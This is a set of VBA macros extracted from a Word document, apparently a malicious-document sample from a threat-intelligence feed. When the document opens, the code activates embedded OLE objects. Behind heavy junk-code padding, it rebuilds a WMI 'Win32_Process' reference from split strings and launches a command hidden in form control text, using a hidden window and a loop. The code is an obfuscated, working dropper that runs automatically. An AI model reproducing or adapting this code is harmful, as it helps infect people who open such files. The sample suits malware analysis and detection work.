Attribute VB_Name = "Lljhsuihdpfu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Oizivtefueia, 0, 0, MSForms, TextBox"
Private Sub Document_Open()
        Dim varObj As Variant
        For Each varObj In ActiveDocument.InlineShapes
        If varObj.Type = wdInlineShapeEmbeddedOLEObject Then
        varObj.OLEFormat.Activate
        End If
        Next varObj
        Dim c As String
        For Each varObj In ActiveDocument.Shapes
        If varObj.Type = msoEmbeddedOLEObject Then
        varObj.OLEFormat.Activate
        End If
        Next varObj
        End Sub
Private Sub Document_Open()
   Select Case Zrvtkymqcpdn
      Case 532
         Wdcosjgvj = Cos(504)
         Nkuintqboph = Atn(737)
         Dolzxlzmxroe = Cos(498)
      Case 418
         Ddmehxcxoshov = Atn(469)
         Gqpukleyhy = 786
         Eptgetxnxckal = CDate(411)
      Case 30
         Atriqmzqa = CInt(537)
         Jkyfegjzyh = Log(Duxzoegojv)
         Eqqhmezs = Knosxeqmryfh
End Select
   Select Case Pmkwpxbblz
      Case 447
         Spphlkifdfdhc = Cos(999)
         Mirtnyazart = Atn(569)
         Lhmguvdikykuy = Cos(301)
      Case 162
         Jiduiiptu = Atn(153)
         Arppqswjt = 817
         Wmgdfbkgzpyv = CDate(815)
      Case 741
         Nzfrvnrbnvmt = CInt(623)
         Sxogiqmrn = Log(Njngscvz)
         Srrxjbvz = Mgcobarnzfw
End Select
   Select Case Jajtzexvhjqt
      Case 200
         Qyycbmshqhmfb = Cos(956)
         Ipcmwgnbtxun = Atn(67)
         Elbtflyh = Cos(695)
      Case 43
         Wbbjbhudzby = Atn(368)
         Hyrcxefhycg = 83
         Llvmvboopvedz = CDate(413)
      Case 793
         Rnockxtv = CInt(638)
         Acwgxyvyf = Log(Hnfxfyrdm)
         Sbqlndbyrqheu = Hswjftqujajf
End Select
Uoxuyzsxu
End Sub
Attribute VB_Name = "Ssdijpjrn"
Attribute VB_Base = "0{94A38B38-826A-4053-994B-0CE54E0270B7}{CA8AF5A6-9A43-4409-998A-A46108C00116}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Zftyfaxnmhn"
Function Fsdxjtoyka()
   Select Case Frernmjevejh
      Case 8
         Uieyirchv = Cos(323)
         Jqkgduhog = Atn(471)
         Wpahjkwh = Cos(638)
      Case 507
         Mqsboqwerywd = Atn(113)
         Wzxrkbtz = 765
         Moxbhrkoupw = CDate(63)
      Case 623
         Epdljocisgxk = CInt(545)
         Eweznmbpzt = Log(Anhjugxhscgqj)
         Iuiaqxeg = Pinqppjpmop
End Select
Lqfbfhwboutcn = Lljhsuihdpfu.Oizivtefueia
   Select Case Juqhoixb
      Case 388
         Cfjhjhttda = Cos(392)
         Gzmvhfwllht = Atn(247)
         Pkifwuhizmahd = Cos(908)
      Case 823
         Fekpfsorvsase = Atn(597)
         Umiltwlohfnig = 622
         Odmaghxdud = CDate(251)
      Case 281
         Mnvcciasoyrz = CInt(360)
         Qcksjhekdxgd = Log(Xiohtcyamdka)
         Wqlmbmqutcut = Jxwzoivg
End Select
Vfovdvtysscjm = Lqfbfhwboutcn + Ssdijpjrn.Tzaoqrwqfvvft + Ssdijpjrn.Xpabylbowh + Ssdijpjrn.Bzaqpzxmuvtaw
   Select Case Zsrcdnznp
      Case 694
         Ocpxpivphuzd = Cos(929)
         Zugrnfyz = Atn(842)
         Gzwunqosnqf = Cos(150)
      Case 796
         Rqgkiakzpaz = Atn(35)
         Twbpspxbrqmb = 7
         Fhpbxzfobgu = CDate(49)
      Case 17
         Uorzxquxsqyxq = CInt(350)
         Aaujgjeszyb = Log(Fuuucpcnaqo)
         Tmqrdgwqn = Ljpqvrawmf
End Select
Volnrlwv = Vfovdvtysscjm + Ssdijpjrn.Tbmbexondtx + Ssdijpjrn.Nsewjwkywlg.ControlTipText
   Select Case Suajhthfifv
      Case 664
         Kpjvmqtnuawd = Cos(67)
         Tzaluhwibosza = Atn(180)
         Bcibknsrrl = Cos(745)
      Case 516
         Dytefxwogiu = Atn(726)
         Vbnvcmppesxn = 293
         Jaiizmqtkhknb = CDate(464)
      Case 815
         Ctihjolfwpz = CInt(974)
         Yfwqdymn = Log(Uobcqfkp)
         Aczpgtlxvm = Upvflujd
End Select
Fsdxjtoyka = Gcogsfuow + Volnrlwv + Gcogsfuow
   Select Case Etioqtsrfaf
      Case 338
         Bxamcconha = Cos(677)
         Xywponptnthv = Atn(233)
         Uuefmcdmf = Cos(109)
      Case 791
         Tdodbxtxvtv = Atn(277)
         Rmpiyiqf = 729
         Iuiboiolshbu = CDate(996)
      Case 364
         Plvoxmny = CInt(334)
         Oznunwyj = Log(Gisvfphid)
         Wcosnnbh = Jwfnovtxw
End Select
End Function
Function Uoxuyzsxu()
   Select Case Vzjuiakgtts
      Case 459
         Qhmzfpwtfut = Cos(93)
         Tjcubiara = Atn(953)
         Ppinfseetwdm = Cos(900)
      Case 482
         Rhtvqeqxb = Atn(276)
         Eysjbzqc = 710
         Pgjnmqpdkq = CDate(306)
      Case 117
         Njbgvkadsocl = CInt(495)
         Muswnjoybakh = Log(Btqpeilihud)
         Oqbexmsd = Ocngphbwng
End Select
Ruivmqio = Join(Split("winOMDNmgmOMDNts:WiOMDNn32_OMDN", "OMDN"), "") + Lljhsuihdpfu.Oizivtefueia + "rocess"
   Select Case Oxepqcjs
      Case 557
         Zzbltmpt = Cos(254)
         Amqurwrohf = Atn(862)
         Heleebwmmmwyb = Cos(971)
      Case 657
         Lnguavibchjxu = Atn(643)
         Lvhcrwaohowg = 189
         Qrshygbbkua = CDate(851)
      Case 61
         Jxuecbsb = CInt(297)
         Ytblyygeokm = Log(Qpvetkkmcrt)
         Njufgnoauoxu = Dqlpqxhd
End Select
Set Iyexwumzwkpr = CreateObject(Null & Ruivmqio)
   Select Case Xxmomsnkx
      Case 38
         Gkcomazjxyb = Cos(103)
         Jurisigzsqcz = Atn(979)
         Hfcymvbtel = Cos(951)
      Case 740
         Srslhvitesaes = Atn(667)
         Pnuzovpsevzo = 246
         Qqgfsppghihr = CDate(847)
      Case 849
         Pexfxdlgk = CInt(569)
         Ddzoqhhoaob = Log(Azciglswxhdzx)
         Qgkgvrolqsq = Dxtnjyfx
End Select
Imzbgslccbx = Ruivmqio + Ssdijpjrn.Ymrjntloqps.ControlTipText + Ssdijpjrn.Rkegmvuqee.ControlTipText
   Select Case Fivjasasacbin
      Case 351
         Pnynvcnjp = Cos(257)
         Ysstkjihtjcmg = Atn(284)
         Wwecpejkgupj = Cos(188)
      Case 983
         Rygyethzhrsag = Atn(78)
         Nbrqdgqenvspi = 617
         Vaelblvncdkwo = CDate(886)
      Case 696
         Pxyostytap = CInt(527)
         Tdmezniwsvui = Log(Nomskbrdfuqu)
         Xhewarbkp = Jgqrtcpcaf
End Select
Ezssqwzdvgvgr = Imzbgslccbx + Lljhsuihdpfu.Oizivtefueia
   Select Case Jwdgxnxoic
      Case 161
         Trzfuixaegpir = Cos(183)
         Lqwbntepghex = Atn(250)
         Pwlechtsem = Cos(370)
      Case 336
         Sedhupyulxl = Atn(348)
         Fpbtyqldqo = 697
         Eorzsmka = CDate(135)
      Case 132
         Amymoyzy = CInt(202)
         Juxsszfvpm = Log(Tdqagutlabl)
         Oulbmeswztk = Hsgpklyktvwor
End Select
Set Uoxuyzsxu = CreateObject(Ezssqwzdvgvgr)
   Select Case Ssnwvhhpywvp
      Case 962
         Lvwhrjhjmv = Cos(466)
         Rfxxxknlgmw = Atn(513)
         Ekakavxycnn = Cos(495)
      Case 397
         Rfkjfski = Atn(374)
         Sbykbkfz = 519
         Unyhzmaoo = CDate(916)
      Case 946
         Jjwtibwgegeo = CInt(632)
         Ibkwnxoph = Log(Hcktrwubk)
         Crtjisuzqyqz = Prardubpoa
End Select
Uoxuyzsxu.XSize = False * False
   Select Case Yfdbjrla
      Case 984
         Kuxifqqvst = Cos(384)
         Vcgoqrjr = Atn(607)
         Jtyamxyhexvjy = Cos(657)
      Case 142
         Sqtalixyx = Atn(62)
         Uvatrzxm = 311
         Jfdtxkpe = CDate(714)
      Case 516
         Dnhyaprdpm = CInt(828)
         Qlcchkfw = Log(Idilphnxit)
         Xhnbtbiuxyiip = Udeziasfdqo
End Select
Uoxuyzsxu.YSize = False * False
   Select Case Hkuzcawbb
      Case 809
         Udwxhtrr = Cos(278)
         Kakhhihmcyzbl = Atn(14)
         Tpvzvtlrofmrc = Cos(245)
      Case 816
         Duqgxjksvs = Atn(146)
         Ygcsrqbndws = 329
         Yjwcvren = CDate(971)
      Case 564
         Ekfinjxahffn = CInt(146)
         Mvablehccc = Log(Opaakbelximhn)
         Vkizlykpz = Bpnbhdkn
End Select
Do While Iyexwumzwkpr.Create(Null & Fsdxjtoyka, Zpsktkcenjdvr, Uoxuyzsxu)
Loop
   Select Case Lniaossviyrj
      Case 644
         Iqddwslw = Cos(804)
         Mkjsqkwyughp = Atn(345)
         Yfgveiqaeffs = Cos(361)
      Case 544
         Jgjohqoejze = Atn(830)
         Sprutzjf = 353
         Qsxblgdnxb = CDate(722)
      Case 372
         Nxtiaftwgqg = CInt(34)
         Lmlltzisuswko = Log(Flhxscbublyel)
         Alqdatsbe = Wtexxmcv
End Select
End Function


INQUEST-PP=macro
